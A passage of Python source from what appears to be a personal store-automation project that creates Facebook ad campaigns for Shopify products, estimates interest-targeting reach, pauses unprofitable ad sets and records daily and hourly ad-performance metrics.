url = input("Input URL: ")
p = shop.shopify.Product.find(id_=p.id)
caption = create_caption(p, shop, i['caption'], url)
advertise(url, p, caption)
print("Added items \n\n")
def s():
a_shop()
def t_format_ids(ids):
return [{"interests": [{'id':i} for i in ids]}]
def t_format_resp(resp):
payload = []
for i in resp:
if i.get('valid',True) == True:
payload.append({'id':i['id'], 'audience_size':i['audience_size'],'name':i['name'],
'category':i.get('disambiguation_category',''), 'topic':i.get('topic','')})
return payload
def t_reach_estimate(shop, ids=None):
account = AdAccount('act_%s'%shop.Facebook_Business_Ad_Account_ID)
t_spec = {'age_max': 65,
'age_min': 18,
'audience_network_positions': ['classic', 'instream_video', 'rewarded_video'],
'device_platforms': ['mobile', 'desktop'],
'facebook_positions': ['feed', 'right_hand_column', 'instant_article'],
'geo_locations': {'countries': ['US'], 'location_types': ['home']},
'publisher_platforms': ['facebook', 'audience_network'],
'targeting_optimization': 'none',
'flexible_spec': []
}
# added this 2nd t_spec in as this is how based on 10/2018 targeting was by default
t_spec = {'age_max': 65,
'age_min': 18,
#'audience_network_positions': ['classic', 'instream_video', 'rewarded_video'],
'device_platforms': ['mobile'],
'facebook_positions': ['feed'],
'geo_locations': {'countries': ['US'],},
'publisher_platforms': ['facebook'],
'targeting_optimization': 'none',
'flexible_spec': []
}
if ids:
t_spec['flexible_spec'] = t_format_ids(ids)
params = {
#'currency': 'USD',
#'optimize_for': AdSet.OptimizationGoal.offsite_conversions,
'targeting_spec': t_spec, }
reach_estimate = account.get_reach_estimate(params=params)
return reach_estimate[0]["users"]
def t_search(q,limit=10000):
resp = TargetingSearch.search(params={'q':q,'type':'adinterest','limit':limit})
return t_format_resp(resp)
def t_suggestion(names):
resp = TargetingSearch.search(params={'interest_list':list(names), 'type':'adinterestsuggestion', 'limit':10000})
return t_format_resp(resp)
def update_adset_names_from_body_url():
a_shop()
for adset in Adset.objects.filter(is_created=True):
url = get_url_from_body(adset.body)
if "bit.ly" in url:
url = requests.get(url).url.replace("/products","")
x = AdSet(adset.adset_id)
x.remote_read(fields=["name", "daily_budget", "targeting"])
#name = url
#name = "%s , %s" % (x["daily_budget"], url)
name = "US %s-%s"%(x["targeting"]["age_min"], x["targeting"]["age_max"])
if x["name"] != name:
ad = x.get_ads()[0]
x.remote_update(params={"name":name})
ad.remote_update(params={"name":name})
class AdsetCreater:
def __call__(self,fbid,url,caption,page_id,interest_ids=[]):
try:
""" ::: Make sure to Check If URL in CAPTION ie NO <redirect_url> &&, request200 url. ::: """
try:get_url_from_body(caption)
except Exception as e: redprint(e); return
""" ::: request200 url ::: """
#h = get_url_from_body(caption)
"""
h = get_url_from_body( "".join(re.findall(r"[a-zA-Z0-9/:- .\n]",caption)) )
while True:
r = requests.get(h) if(h.startswith("http")) else (requests.get( ("https://"+h) ))
t = r.url.split("/")[-1].split("?")[0]
if(200!=r.status_code):
redinput("(before Campaign Creation) \n 200!=status_code for %s\n\n\nASSOCIATED_CAPTION:\n%s\n\n" % (h,caption,"please fix the redirect or something, maybe it was erried"))
elif(200==r.status_code):
redprint("200==status_code for %s\n\n\nASSOCIATED_CAPTION:\n%s" % (h,caption))
break
"""
c = Campaign(parent_id="act_{}".format(fbid))
c["name"] = "Conversions"
c["buying_type"] = "AUCTION"
c["objective"] = "CONVERSIONS"
c.save()
a = AdSet(parent_id="act_{}".format(fbid))
#a["name"] = "US 18+"
a["campaign_id"] = c["id"]
a["daily_budget"] = 500
a["name"] = "US 18+ "# + t
a["optimization_goal"] = "OFFSITE_CONVERSIONS"
a["promoted_object"] = {"custom_event_type": "PURCHASE", "pixel_id": Filter(Shop,Facebook_Business_Ad_Account_ID=fbid)[0].Facebook_Pixel_ID}
a["start_time"] = "%s 6:00:00 EST"%(Date().dt(0) if datetime.now().hour in [0,1,2] else Date().dt(1))
#@[2018.12.6 10:26 PM[mvdto(-1)]]a["start_time"] = "%s 5:00:00 EST"%(Date().dt(1) if datetime.now().hour in [0,1,2] else Date().dt(2))
a["billing_event"] = "IMPRESSIONS"
a["bid_strategy"] = "LOWEST_COST_WITHOUT_CAP"
a["targeting"] = dict(age_min = 18,
device_platforms = ["mobile"],
facebook_positions = ["feed"],
publisher_platforms = ["facebook"],
targeting_optimization = "none",
geo_locations = {"countries": ["US"], "location_types": ["home", "recent"]},
flexible_spec = t_format_ids(interest_ids),
)
a.save()
v = Ad(parent_id="act_{}".format(fbid))
#@[2018.12.8][Tried accessing nonexisting field (url_tags) on node type (Adgroup)]v["url_tags"] = "adset_id=%s"%(a["id"])
v["name"] = "US 18+ "# + t
v["adset_id"] = a["id"]
(lambda fbid=fbid,url=url,caption=caption,page_id=page_id: [
setitem(globals(),"image",AdImage(parent_id="act_{}".format(fbid))) ,
#setitem(globals()["image"],"filename", Images().contrast_sharpen(Images().download_and_resize(url, 1200))) ,
setitem(globals()["image"],"filename", Images().contrast_sharpen(Images().download_and_resize(url, 1200),contrast=True,sharpen=False)) ,
globals()["image"].remote_create() ,
setitem(globals(),"photo_data",AdCreativePhotoData()) ,
setitem(globals()["photo_data"],"image_hash",globals()["image"]["hash"]) ,
setitem(globals()["photo_data"],"caption",caption) ,
setitem(globals()["photo_data"],"page_welcome_message","Hello. Do you need any assistance?") ,
setitem(globals(),"object_story_spec",AdCreativeObjectStorySpec()) ,
setitem(globals()["object_story_spec"],"page_id",page_id) ,
setitem(globals()["object_story_spec"],"photo_data",globals()["photo_data"]) ,
setitem(globals(),"creative",AdCreative(parent_id="act_%s"%fbid)) ,
setitem(globals()["creative"],"name","Dark Post") ,
setitem(globals()["creative"],"object_story_spec",globals()["object_story_spec"]) ,
setitem(globals()["creative"],"url_tags","&zcli=%s"%( Recompilate().recompilate(str(a["id"])).x )) ,
"ajergcwonirgsncraoigncasdfkadpaksogranopgas;nrgoasingr" ,
# globals()["creative"].remote_create() ,
])()
v["creative"] = globals()["creative"]
if ADSET_TESTING == True:
a["status"] = "PAUSED"
a.remote_update()
v.save()
return int(a["campaign_id"]), int(v["adset_id"])
except Exception as e:
redprint(e)
redprint("deleting ")
OSA.notify("deleting. ")
OSA.notify(str(e))
tryprocess(c.remote_delete); tryprocess(a.remote_delete); tryprocess(v.remote_delete)
class Adsetinsight_Algorithms:
def one(self):
""" ::: Get all adsethourlyinsights with sales. Then, keep adding impressions, get average hour/impression count of 1st sale. :::"""
x = [keysort("date",Adsethourlyinsight.objects.filter(adset_id=i),tcer=False) for i in set(key("adset_id",Adsethourlyinsight.objects.all())) if list(set(key("website_purchase", Adsethourlyinsight.objects.filter(adset_id=i)))) != [0]]
v = []
for i in x:
impressions = 0
for idx,j in enumerate(i):
impressions += j.impression
if j.website_purchase != 0:
v.append([impressions, idx])
break
print( "hour ", sum([b[1] for b in v])/len(v) )
print( "impressions", sum([b[0] for b in v])/len(v) )
def one_data(self):
""" ::: Get all adsethourlyinsights with sales. Then, keep adding impressions, get average hour/impression count of 1st sale. :::"""
x = set(key("adset_id",Adsethourlyinsightdata.objects.all()))
data = []
for i in x:
if list(set(key("website_purchase_move", Adsethourlyinsightdata.objects.filter(adset_id=i)))) != [0]:
data.append(keysort("date",Adsethourlyinsightdata.objects.filter(adset_id=i),tcer=False) )
v = []
for i in data:
impression_moves = 0
for idx,j in enumerate(i):
impression_moves += j.impression_move
if j.website_purchase_move != 0:
v.append([impression_moves, idx])
break
print( "hour ", sum([b[1] for b in v])/len(v) )
print( "impressions", sum([b[0] for b in v])/len(v) )
def two(self):
for adset in Adset.objects.filter(is_created=True):
if adset.status=="ACTIVE":
data = keysort("date", Adsethourlyinsight.objects.filter(adset_id=adset.adset_id), tcer=False)
impressions = 0; sales = 0
for x in data:
impressions+=x.impression
sales+=x.website_purchase
print(impressions, sales)
if impressions > 500:
if sales < 1:
print("stop")
print("[adset_id][%s]"%adset.adset_id)
input("please check it, impressions: %s, sales: %s" % (impressions, sales))
Adset(adset.adset_id).remote_update(params={"status":"PAUSED"})
class Interest_Tools(DecisionTree):
def t_format_resp(self, resp):
payload = []
for i in resp:
if i.get('valid',True) == True:
payload.append({'id':i['id'], 'audience_size':i['audience_size'],'name':i['name'],
'category':i.get('disambiguation_category',''), 'topic':i.get('topic','')})
return payload
def t_search(self, q):
resp = TargetingSearch.search(params={'q':q,'type':'adinterest','limit':10000})
return self.t_format_resp(resp)
def t_suggestion(self, names):
resp = TargetingSearch.search(params={'interest_list':list(names), 'type':'adinterestsuggestion', 'limit':10000})
return self.t_format_resp(resp)
def t_format_ids(self, ids):
return [{"interests": [{'id':i} for i in ids]}]
def t_reach_estimate(self, shop, ids=None):
account = AdAccount('act_%s'%shop.Facebook_Business_Ad_Account_ID)
t_spec = {'age_max': 65,
'age_min': 18,
'audience_network_positions': ['classic', 'instream_video', 'rewarded_video'],
'device_platforms': ['mobile', 'desktop'],
'facebook_positions': ['feed', 'right_hand_column', 'instant_article'],
'geo_locations': {'countries': ['US'], 'location_types': ['home']},
'publisher_platforms': ['facebook', 'audience_network'],
'targeting_optimization': 'none',
'flexible_spec': []
}
if ids:
t_spec['flexible_spec'] = self.t_format_ids(ids)
params = {
'currency': 'USD',
'optimize_for': AdSet.OptimizationGoal.offsite_conversions,
'targeting_spec': t_spec, }
reach_estimate = account.get_reach_estimate(params=params)
return reach_estimate[0]["users"]
class InstagramBot:
def __init__(self):
self.bot = ExecutableText().export("InstagramBot")
class October_Keyword_Utilities:
#@[2018.11.23 02:44 PM][I took out the __init__ because i did print the exception in `pool` and i was not able to set the shop that many times in succession. i then got the api call must be set error and then i just set the shop in the beginning]
t_format_ids = lambda self, ids: [{"interests": [{'id':i} for i in ids]}]
def t_format_resp(self, resp):
payload = []
for i in resp:
if i.get('valid',True) == True:
payload.append({'id':i['id'], 'audience_size':i['audience_size'],'name':i['name'],
'category':i.get('disambiguation_category',''), 'topic':i.get('topic','')})
return payload
def receive_interest_dictlist(self, x, niche):
""" ::: Problem: (1)Order (2)integer_ids ::: """
""" ::: Solution: (1)integerify__forloop (2)keysort__id ::: """
for i in x: i["id"] = int(i["id"])
x = keysort("id",x)
if x not in key("keywordlist",All(Facebookkeywordlist)):
Facebookkeywordlist(niche=niche, keywordlist=x, audience_size=October_Keyword_Utilities().re(x)).save()
def re(self, io=None):
if not io: return 1000000000
ids = None
""" ::: if io aint just ids, and its dictlist, ok, make ids the key("id"), else, ids=io(int list) ::: """
if(type(io[0]) not in [str,int]):
ids = key("id",io)
else:
ids = io
account = AdAccount("act_%s"%(a_shop().Facebook_Business_Ad_Account_ID))
t_spec = {'age_max': 65,
'age_min': 18,
'audience_network_positions': ['classic', 'instream_video', 'rewarded_video'],
'device_platforms': ['mobile', 'desktop'],
'facebook_positions': ['feed', 'right_hand_column', 'instant_article'],
'geo_locations': {'countries': ['US'], 'location_types': ['home']},
'publisher_platforms': ['facebook', 'audience_network'],
'targeting_optimization': 'none',
'flexible_spec': []
}
# automatic placements
t_spec = {'age_max': 65,
'age_min': 18,
'geo_locations': {'countries': ['US'], 'location_types': ['home']},
'targeting_optimization': 'none',
'flexible_spec': []
}
# added this 2nd t_spec in as this is how based on 10/2018 targeting was by default
# t_spec = {'age_max': 65,
# 'age_min': 18,
# #'audience_network_positions': ['classic', 'instream_video', 'rewarded_video'],
# 'device_platforms': ['mobile'],
# 'facebook_positions': ['feed'],
# 'geo_locations': {'countries': ['US'],},
# 'publisher_platforms': ['facebook'],
# 'targeting_optimization': 'none',
# 'flexible_spec': []
# }
if ids:
t_spec['flexible_spec'] = t_format_ids(ids)
params = {
#'currency': 'USD',
#'optimize_for': AdSet.OptimizationGoal.offsite_conversions,
'targeting_spec': t_spec, }
reach_estimate = account.get_reach_estimate(params=params)
return reach_estimate[0]["users"]
def t_search(self, q, limit=10000):
resp = TargetingSearch.search(params={'q':q,'type':'adinterest','limit':limit})
return t_format_resp(resp)
def t_suggestion(self, names, limit=10000):
resp = TargetingSearch.search(params={'interest_list':list(names), 'type':'adinterestsuggestion', 'limit':limit})
return t_format_resp(resp)
def se(self, q, limit=50):
#@altered to achieve results with `,` or `\n`
new = []
for q in copy.deepcopy(q).replace("\n",",").split(","):
x = [i for i in json.loads(requests.get(Muta()().targeting_search_url.format(q,limit)).text).get("data",[]) if("interests"==i["type"]) ]
def pool_target(i):
x = dict(id=int(i["id"]),name=i["name"],audience_size=Facebookkeyword.re( int(i["id"]) ) )
return x
if len(x) == 0:
OSA.notify("No Results for `{}`".format(q))
return []
x = pool(pool_target, x, nodes=2).result()
x = [Facebookkeyword(**i) for i in x]
# keycall("save",x)
for i in x: i.save()
x = keycall("zone", x)
new.extend(x)
return new
def su(self, ids, limit=50):
targeting_list = json.dumps([{"id":i,"type":"interests"} for i in ids])
redprint(targeting_list)
x = [i for i in json.loads(requests.get(Muta()().targeting_suggestions_url.format(targeting_list,limit)).text).get("data",[]) if("interests"==i["type"]) ]
def pool_target(i):
x = dict(id=int(i["id"]),name=i["name"],audience_size=Facebookkeyword.re( int(i["id"]) ) )
redprint("hello")
return x
x = pool(pool_target, x, nodes=15).result()
x = [Facebookkeyword(**i) for i in x]
keycall("save",x)
#return keysort("audience_size", x)
x = keycall("zone", x)
return x
class July_Adset_Utilities:
def __init__(self):
r""" This is important since looking at it now I forget the parameters and it looks as if i did not write any of it before"""
#self.shop = shop
# keep these for storage purposes
a_shop()
self.data_all_fields = ["spend","adset_id","date","frequency","impression","impression_cost","impression_rate","post_click","post_click_cost","post_click_rate","click","click_cost","click_rate","add_to_cart","add_to_cart_cost","add_to_cart_rate","website_purchase","website_purchase_cost","website_purchase_rate","spend","website_purchase_value","return_on_investment","reach","reach_cost","reach_rate","landing_page_view","landing_page_view_cost","landing_page_view_rate","fb_pixel_view_content","fb_pixel_view_content_cost","fb_pixel_view_content_rate","fb_pixel_initiate_checkout","fb_pixel_initiate_checkout_cost","fb_pixel_initiate_checkout_rate","page_engagement","page_engagement_cost","page_engagement_rate","post_engagement","post_engagement_cost","post_engagement_rate","post_reaction","post_reaction_cost","post_reaction_rate"]
self.data_fields = ["spend","adset_id","date","frequency","impression","impression_cost","impression_rate","post_click","post_click_cost","post_click_rate","click","click_cost","click_rate","add_to_cart","add_to_cart_cost","add_to_cart_rate","website_purchase","website_purchase_cost","website_purchase_rate","spend","website_purchase_value","return_on_investment"]
self.get_insight_fields = ["adset_id", "action_values", "actions", "adset_name", "clicks", "date_start", "date_stop", "frequency", "impressions", "reach", "relevance_score", "spend"]
self.get_insight_params = {"time_increment": 1, "time_range": {"since": (Date()-0).datestr,"until": (Date()-0).datestr}}
def get_campaigns(self, limit = 500):
return self.shop.fb.get_campaigns(params = {"limit": limit})
def get_adsets(self, campaign_id, limit = 500):
scope_campaign = Campaign(campaign_id)
adsets = scope_campaign.get_ad_sets(params = {"limit": limit})
return adsets
def pause_adset(self, adset_id):
input("is this ok?: ")
shop = Shop()( Adset.objects.get(adset_id=adset_id).shop_abbreviation)
adset = AdSet(adset_id)
adset["status"] = "PAUSED"
status_check = adset.remote_update()
print("adset %s: %s √"%(adset_id, status_check))
assert status_check['status'] == 'PAUSED'
Update(Get(Adset,adset_id=adset_id),status="PAUSED")
def restart_adset(self, adset_id):
input("is this ok?: ")
shop = Shop()( Adset.objects.get(adset_id=adset_id).shop_abbreviation)
adset = AdSet(adset_id)
adset["status"] = "ACTIVE"
status_check = adset.remote_update()
print("adset %s: %s √"%(adset_id, status_check))
assert status_check['status'] == 'ACTIVE'
Update(Get(Adset,adset_id=adset_id),status="ACTIVE")
def update_adset(self, id):
new = Get(Adset,adset_id=id)
data = AdSet(new.adset_id).remote_read(fields=["campaign_id","id"])
new.campaign_id = data["campaign_id"]
new.adset_id = data["id"]
new.save()
def update_adsetinsight_data(self, id, date_start = 5, date_end = 0, time_increment = 1, fields = ["adset_id", "action_values", "actions", "adset_name", "clicks", "date_start", "date_stop", "frequency", "impressions", "reach", "relevance_score", "spend"]):
adset = Filter(Adset, adset_id=id)[0]
self.shop = Shop()( adset.shop_abbreviation)
data = [AttrDict(i.export_all_data()) for i in AdSet(adset.adset_id).get_insights(fields = fields, params={"time_increment": time_increment, "time_range": {"since": (Date()-date_start).datestr,"until": (Date()-date_end).datestr}})]
for i in data:
new = Adsetinsight()
existing = Adsetinsight.objects.filter(adset_id = adset.adset_id, date = Date().myDatetimenow(Date(i.date_start).dateobj))
if len(existing) == 1:
new = existing[0]
print("an existing")
actions = i.get("actions", {})
action_values = i.get("action_values", {})
actions_dict = AttrDict(dict(zip(key("action_type", actions), key("value", actions))))
action_values_dict = AttrDict(dict(zip(key("action_type", action_values), key("value", action_values))))
spend = round(float(i.spend), 4)
adset_id = adset.adset_id
date = Date().myDatetimenow(Date(i.date_start).dateobj)
frequency = round(float(i.frequency), 4)
impression = int(i.impressions)
if(0==impression):continue
impression_cost = round(float(tryreturn(lambda: spend / impression)), 4)
impression_rate = 0
post_click = int(i.clicks)
post_click_cost = round(float(tryreturn(lambda: spend / post_click)), 4)
post_click_rate = round(float(tryreturn(lambda: post_click / impression)), 4)
click = int(actions_dict.get("link_click", 0))
click_cost = round(float(tryreturn(lambda: spend / click)), 4)
click_rate = round(float(tryreturn(lambda: click / impression)), 4)
add_to_cart = int(actions_dict.get("offsite_conversion.fb_pixel_add_to_cart", 0))
add_to_cart_cost = round(float(tryreturn(lambda: spend / add_to_cart)), 4)
try:add_to_cart_rate = round(float(tryreturn(lambda: add_to_cart / impression)), 4)
except:add_to_cart_rate = 0 #(?)
website_purchase = int(actions_dict.get("offsite_conversion.fb_pixel_purchase", 0))
##conversion_pixel_purchase = int(actions_dict.get("offsite_conversion", 0))
##if website_purchase > 0 and conversion_pixel_purchase == 0:
## website_purchase = website_purchase
##if website_purchase > 0 and conversion_pixel_purchase > 0:
## website_purchase = ((website_purchase+conversion_pixel_purchase) / 2)
##if website_purchase == 0 and conversion_pixel_purchase > 0:
## website_purchase = conversion_pixel_purchase
website_purchase_cost = round(float(tryreturn(lambda: spend / website_purchase)), 4)
website_purchase_rate = round(float(tryreturn(lambda: website_purchase / impression)), 4)
spend = round(float(i.spend), 4)
website_purchase_value = round(float(action_values_dict.get("offsite_conversion.fb_pixel_purchase", 0)), 4)
return_on_investment = round(float(tryreturn(lambda: website_purchase_value / spend)), 4)
reach = int(i.reach)
reach_cost = round(float(tryreturn(lambda: spend / reach)), 4)
reach_rate = 0
landing_page_view = int(actions_dict.get("landing_page_view", 0))
landing_page_view_cost = round(float(tryreturn(lambda: spend / landing_page_view)), 4)
landing_page_view_rate = round(float(tryreturn(lambda: landing_page_view / impression)), 4)
fb_pixel_view_content = int(actions_dict.get("offsite_conversion.fb_pixel_view_content", 0))
fb_pixel_view_content_cost = round(float(tryreturn(lambda: spend / fb_pixel_view_content)), 4)
fb_pixel_view_content_rate = round(float(fb_pixel_view_content / impression), 4)
fb_pixel_initiate_checkout = int(actions_dict.get("offsite_conversion.fb_pixel_initiate_checkout", 0))
fb_pixel_initiate_checkout_cost = round(float(tryreturn(lambda: spend / fb_pixel_initiate_checkout)), 4)
fb_pixel_initiate_checkout_rate = round(float(fb_pixel_initiate_checkout / impression), 4)
page_engagement = int(actions_dict.get("page_engagement", 0))
page_engagement_cost = round(float(tryreturn(lambda: spend / page_engagement)), 4)
page_engagement_rate = round(float(page_engagement / impression), 4)
post_engagement = int(actions_dict.get("post_engagement", 0))
post_engagement_cost = round(float(tryreturn(lambda: spend / post_engagement)), 4)
post_engagement_rate = round(float(post_engagement / impression), 4)
post_reaction = int(actions_dict.get("post_reaction", 0))
post_reaction_cost = round(float(tryreturn(lambda: spend / post_reaction)), 4)
post_reaction_rate = round(float(post_reaction / impression), 4)
greenprint("[update_adsetinsight_data][spend][%s]"% spend)
greenprint("[update_adsetinsight_data][adset_id][%s]"% adset_id)
greenprint("[update_adsetinsight_data][date][%s]"% date)
greenprint("[update_adsetinsight_data][frequency][%s]"% frequency)
greenprint("[update_adsetinsight_data][impression][%s]"% impression)
greenprint("[update_adsetinsight_data][impression_cost][%s]"% impression_cost)
greenprint("[update_adsetinsight_data][impression_rate][%s]"% impression_rate)
greenprint("[update_adsetinsight_data][post_click][%s]"% post_click)
greenprint("[update_adsetinsight_data][post_click_cost][%s]"% post_click_cost)
greenprint("[update_adsetinsight_data][post_click_rate][%s]"% post_click_rate)
greenprint("[update_adsetinsight_data][click][%s]"% click)
greenprint("[update_adsetinsight_data][click_cost][%s]"% click_cost)
greenprint("[update_adsetinsight_data][click_rate][%s]"% click_rate)
greenprint("[update_adsetinsight_data][add_to_cart][%s]"% add_to_cart)
greenprint("[update_adsetinsight_data][add_to_cart_cost][%s]"% add_to_cart_cost)
greenprint("[update_adsetinsight_data][add_to_cart_rate][%s]"% add_to_cart_rate)
greenprint("[update_adsetinsight_data][website_purchase][%s]"% website_purchase)
greenprint("[update_adsetinsight_data][website_purchase_cost][%s]"% website_purchase_cost)
greenprint("[update_adsetinsight_data][website_purchase_rate][%s]"% website_purchase_rate)
greenprint("[update_adsetinsight_data][spend][%s]"% spend)
greenprint("[update_adsetinsight_data][website_purchase][%s]"% website_purchase_value)
greenprint("[update_adsetinsight_data][offsite_conversion][%s]"% website_purchase_value)
greenprint("[update_adsetinsight_data][website_purchase_value][%s]"% website_purchase_value)
greenprint("[update_adsetinsight_data][return_on_investment][%s]"% return_on_investment)
greenprint("[update_adsetinsight_data][reach][%s]"% reach)
greenprint("[update_adsetinsight_data][reach_cost][%s]"% reach_cost)
greenprint("[update_adsetinsight_data][reach_rate][%s]"% reach_rate)
greenprint("[update_adsetinsight_data][landing_page_view][%s]"% landing_page_view)
greenprint("[update_adsetinsight_data][landing_page_view_cost][%s]"% landing_page_view_cost)
greenprint("[update_adsetinsight_data][landing_page_view_rate][%s]"% landing_page_view_rate)
greenprint("[update_adsetinsight_data][fb_pixel_view_content][%s]"% fb_pixel_view_content)
greenprint("[update_adsetinsight_data][fb_pixel_view_content_cost][%s]"% fb_pixel_view_content_cost)
greenprint("[update_adsetinsight_data][fb_pixel_view_content_rate][%s]"% fb_pixel_view_content_rate)
greenprint("[update_adsetinsight_data][fb_pixel_initiate_checkout][%s]"% fb_pixel_initiate_checkout)
greenprint("[update_adsetinsight_data][fb_pixel_initiate_checkout_cost][%s]"% fb_pixel_initiate_checkout_cost)
greenprint("[update_adsetinsight_data][fb_pixel_initiate_checkout_rate][%s]"% fb_pixel_initiate_checkout_rate)
greenprint("[update_adsetinsight_data][page_engagement][%s]"% page_engagement)
greenprint("[update_adsetinsight_data][page_engagement_cost][%s]"% page_engagement_cost)
greenprint("[update_adsetinsight_data][page_engagement_rate][%s]"% page_engagement_rate)
greenprint("[update_adsetinsight_data][post_engagement][%s]"% post_engagement)
greenprint("[update_adsetinsight_data][post_engagement_cost][%s]"% post_engagement_cost)
greenprint("[update_adsetinsight_data][post_engagement_rate][%s]"% post_engagement_rate)
greenprint("[update_adsetinsight_data][post_reaction][%s]"% post_reaction)
greenprint("[update_adsetinsight_data][post_reaction_cost][%s]"% post_reaction_cost)
greenprint("[update_adsetinsight_data][post_reaction_rate][%s]"% post_reaction_rate)
new.spend = spend
new.ad_account_id = self.shop.Facebook_Business_Ad_Account_ID
new.adset_id = adset_id
new.date = date
new.frequency = frequency
new.impression = impression
new.impression_cost = impression_cost
new.impression_rate = impression_rate
new.post_click = post_click
new.post_click_cost = post_click_cost
new.post_click_rate = post_click_rate
new.click = click
new.click_cost = click_cost
new.click_rate = click_rate
new.add_to_cart = add_to_cart
new.add_to_cart_cost = add_to_cart_cost
new.add_to_cart_rate = add_to_cart_rate
new.website_purchase = website_purchase
new.website_purchase_cost = website_purchase_cost
new.website_purchase_rate = website_purchase_rate
new.spend = spend
new.website_purchase_value = website_purchase_value
new.return_on_investment = return_on_investment
new.reach = reach
new.reach_cost = reach_cost
new.reach_rate = reach_rate
new.landing_page_view = landing_page_view
new.landing_page_view_cost = landing_page_view_cost
new.landing_page_view_rate = landing_page_view_rate
new.fb_pixel_view_content = fb_pixel_view_content
new.fb_pixel_view_content_cost = fb_pixel_view_content_cost
new.fb_pixel_view_content_rate = fb_pixel_view_content_rate
new.fb_pixel_initiate_checkout = fb_pixel_initiate_checkout
new.fb_pixel_initiate_checkout_cost = fb_pixel_initiate_checkout_cost
new.fb_pixel_initiate_checkout_rate = fb_pixel_initiate_checkout_rate
new.page_engagement = page_engagement
new.page_engagement_cost = page_engagement_cost
new.page_engagement_rate = page_engagement_rate
new.post_engagement = post_engagement
new.post_engagement_cost = post_engagement_cost
new.post_engagement_rate = post_engagement_rate
new.post_reaction = post_reaction
new.post_reaction_cost = post_reaction_cost
new.post_reaction_rate = post_reaction_rate
new.save()
# https://developers.facebook.com/docs/marketing-api/click-tags
def update_adsethourlyinsight_data(self, id, date_start = 5, date_end = 0, time_increment = 1, breakdowns=["hourly_stats_aggregated_by_advertiser_time_zone"], fields = ["adset_id", "action_values", "actions", "adset_name", "clicks", "date_start", "date_stop", "frequency", "impressions", "reach", "relevance_score", "spend"]):
"""
date_start = 800
date_end = 0
time_increment = 1
breakdowns=["hourly_stats_aggregated_by_advertiser_time_zone"]
fields = ["adset_id", "action_values", "actions", "adset_name", "clicks", "date_start", "date_stop", "frequency", "impressions", "reach", "relevance_score", "spend"]
insights = adset.get_insights(fields = fields, params={"time_increment": time_increment, "time_range": {"since": (Date()-date_start).datestr,"until": (Date()-date_end).datestr}} )
"""
# used to be date_start = 0 and date_end = 0, it only gets data for `today` but it could end early, ie, @/3hrs, date_start= 1 would have been better
#
adset = Filter(Adset,adset_id=id)[0]
self.shop = Shop()( adset.shop_abbreviation)
data = [AttrDict(i.export_all_data()) for i in AdSet(adset.adset_id).get_insights(fields = fields, params={"breakdowns": breakdowns, "time_increment": time_increment, "time_range": {"since": (Date()-date_start).datestr,"until": (Date()-date_end).datestr}})]
for i in data:
new = Adsethourlyinsight()
date = (round((int(i.hourly_stats_aggregated_by_advertiser_time_zone.split(" - ")[0].split(":")[0])/24),2)+Date().myDatetimenow(Date(i.date_start).dateobj) )
distinct_print("[%s][%s]"%(date,i.hourly_stats_aggregated_by_advertiser_time_zone))
for d in range(24):
tryprocess(Adsethourlyinsight(ad_account_id=self.shop.Facebook_Business_Ad_Account_ID, date=(Date().myDatetimenow(Date(i.date_start).dateobj)+round((d/24),2)), adset_id=i.adset_id ).save)
existing = Adsethourlyinsight.objects.filter(adset_id = adset.adset_id, date = date)
if len(existing) == 1:
new = existing[0]
print("an existing")
actions = i.get("actions", {})
action_values = i.get("action_values", {})
actions_dict = AttrDict(dict(zip(key("action_type", actions), key("value", actions))))
action_values_dict = AttrDict(dict(zip(key("action_type", action_values), key("value", action_values))))
spend = round(float(i.spend), 4)
adset_id = adset.adset_id
#date = Date().myDatetimenow(Date(i.date_start).dateobj)
#frequency = round(float(i.frequency), 4)
impression = int(i.impressions)
if(0==impression):continue
impression_cost = round(float(tryreturn(lambda: spend / impression)), 4)
impression_rate = 0
post_click = int(i.clicks)
post_click_cost = round(float(tryreturn(lambda: spend / post_click)), 4)
post_click_rate = round(float(tryreturn(lambda: post_click / impression)), 4)
click = int(actions_dict.get("link_click", 0))
click_cost = round(float(tryreturn(lambda: spend / click)), 4)
click_rate = round(float(tryreturn(lambda: click / impression)), 4)
add_to_cart = int(actions_dict.get("offsite_conversion.fb_pixel_add_to_cart", 0))
add_to_cart_cost = round(float(tryreturn(lambda: spend / add_to_cart)), 4)
try:add_to_cart_rate = round(float(tryreturn(lambda: add_to_cart / impression)), 4)
except:add_to_cart_rate = 0 #(?)
website_purchase = int(actions_dict.get("offsite_conversion.fb_pixel_purchase", 0))
#conversion_pixel_purchase = int(actions_dict.get("offsite_conversion", 0))
#if website_purchase > 0 and conversion_pixel_purchase == 0:
# website_purchase = website_purchase
#if website_purchase > 0 and conversion_pixel_purchase > 0:
# website_purchase = ((website_purchase+conversion_pixel_purchase) / 2)
#if website_purchase == 0 and conversion_pixel_purchase > 0:
# website_purchase = conversion_pixel_purchase
website_purchase_cost = round(float(tryreturn(lambda: spend / website_purchase)), 4)
website_purchase_rate = round(float(tryreturn(lambda: website_purchase / impression)), 4)
spend = round(float(i.spend), 4)
website_purchase_value = round(float(action_values_dict.get("offsite_conversion.fb_pixel_purchase", 0)), 4)
return_on_investment = round(float(tryreturn(lambda: website_purchase_value / spend)), 4)
#reach = int(i.reach)
#reach_cost = round(float(tryreturn(lambda: spend / reach)), 4)
#reach_rate = 0
landing_page_view = int(actions_dict.get("landing_page_view", 0))
landing_page_view_cost = round(float(tryreturn(lambda: spend / landing_page_view)), 4)
landing_page_view_rate = round(float(tryreturn(lambda: landing_page_view / impression)), 4)
fb_pixel_view_content = int(actions_dict.get("offsite_conversion.fb_pixel_view_content", 0))
fb_pixel_view_content_cost = round(float(tryreturn(lambda: spend / fb_pixel_view_content)), 4)
fb_pixel_view_content_rate = round(float(fb_pixel_view_content / impression), 4)
fb_pixel_initiate_checkout = int(actions_dict.get("offsite_conversion.fb_pixel_initiate_checkout", 0))
fb_pixel_initiate_checkout_cost = round(float(tryreturn(lambda: spend / fb_pixel_initiate_checkout)), 4)
fb_pixel_initiate_checkout_rate = round(float(fb_pixel_initiate_checkout / impression), 4)
page_engagement = int(actions_dict.get("page_engagement", 0))
page_engagement_cost = round(float(tryreturn(lambda: spend / page_engagement)), 4)
page_engagement_rate = round(float(page_engagement / impression), 4)
post_engagement = int(actions_dict.get("post_engagement", 0))
post_engagement_cost = round(float(tryreturn(lambda: spend / post_engagement)), 4)
post_engagement_rate = round(float(post_engagement / impression), 4)
post_reaction = int(actions_dict.get("post_reaction", 0))
post_reaction_cost = round(float(tryreturn(lambda: spend / post_reaction)), 4)
post_reaction_rate = round(float(post_reaction / impression), 4)
new.spend = spend
new.ad_account_id = self.shop.Facebook_Business_Ad_Account_ID
new.adset_id = adset_id
new.date = date
